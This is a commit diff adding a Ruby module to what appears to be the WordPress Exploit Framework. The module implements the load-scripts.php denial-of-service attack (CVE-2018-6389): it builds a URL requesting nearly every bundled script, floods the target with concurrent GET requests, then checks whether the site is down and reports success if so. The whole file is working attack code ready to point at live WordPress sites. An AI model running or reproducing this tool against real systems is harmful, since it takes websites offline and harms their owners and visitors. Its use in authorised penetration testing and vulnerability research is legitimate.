Add load-scripts.php DoS module

rastating · rastating · commit 2763cfadd56d · 2018-04-01T00:29:48.000+01:00
diff --git a/modules/auxiliary/dos/load_scripts_dos.rb b/modules/auxiliary/dos/load_scripts_dos.rb
@@ -0,0 +1,129 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::LoadScriptsDos < Wpxf::Module
+  include Wpxf
+  include Wpxf::Net::HttpClient
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WordPress "load-scripts.php" DoS',
+      desc: %(
+        All versions of WordPress, as of March, 2018, are vulnerable to a
+        denial of service attack by making large amounts of requests to the
+        load-scripts.php file. This module allows users to configure a maximum
+        number of requests (via `max_requests`), and the number of threads to
+        use (`max_http_concurrency`) and will execute the requests and then
+        check the status of the website.
+      ),
+      author: [
+        'Barak Tawily', # Vulnerability disclosure
+        'rastating'     # WPXF module
+      ],
+      references: [
+        ['CVE', '2018-6389'],
+        ['WPVDB', '9021'],
+        ['URL', 'https://baraktawily.blogspot.co.uk/2018/02/how-to-dos-29-of-world-wide-websites.html']
+      ],
+      date: 'Feb 05 2018'
+    )
+
+    register_options([
+      IntegerOption.new(
+        name: 'max_requests',
+        required: true,
+        desc: 'Max number of requests to send',
+        default: 200
+      ),
+      IntegerOption.new(
+        name: 'http_client_timeout',
+        desc: 'Max wait time in seconds for HTTP responses',
+        default: 5,
+        required: true
+      )
+    ])
+  end
+
+  def max_requests
+    normalized_option_value('max_requests')
+  end
+
+  def check
+    wordpress_and_online? ? :vulnerable : :unknown
+  end
+
+  def vulnerable_url
+    normalize_uri(
+      full_uri,
+      'wp-admin',
+      'load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,'\
+      'wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,'\
+      'wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,'\
+      'scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound'\
+      ',scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,'\
+      'jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,'\
+      'jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,'\
+      'jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate'\
+      ',jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,'\
+      'jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,'\
+      'jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu'\
+      ',jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,'\
+      'jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,'\
+      'jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color'\
+      ',schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,'\
+      'jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject'\
+      ',moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers'\
+      ',comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect'\
+      ',mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement'\
+      ',wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,'\
+      'wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,'\
+      'language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent'\
+      ',customize-base,customize-loader,customize-preview,customize-models,customize-views,'\
+      'customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets'\
+      ',customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models'\
+      ',wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox'\
+      ',tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,'\
+      'media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,'\
+      'custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,'\
+      'wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,'\
+      'custom-header,custom-background,media-gallery,svg-painter&ver=4.9.1'
+    )
+  end
+
+  def setup_requests
+    opts = {
+      url: vulnerable_url,
+      method: :get
+    }
+
+    self.complete_requests = 0
+    max_requests.times do
+      queue_request(opts) do |_res|
+        self.complete_requests += 1
+        emit_warning("#{complete_requests} requests executed") if (complete_requests % 10).zero?
+      end
+    end
+  end
+
+  def run
+    return false unless super
+
+    emit_info "Preparing #{max_requests} requests..."
+    setup_requests
+
+    emit_info "Beginning execution of #{max_requests} requests over #{max_http_concurrency} threads"
+    execute_queued_requests
+    emit_success 'Finished executing requests'
+
+    if wordpress_and_online?
+      emit_error "FAILED: #{full_uri} appears to still be online"
+      return false
+    else
+      emit_success "#{full_uri} appears to be down"
+      return true
+    end
+  end
+
+  attr_accessor :complete_requests
+end
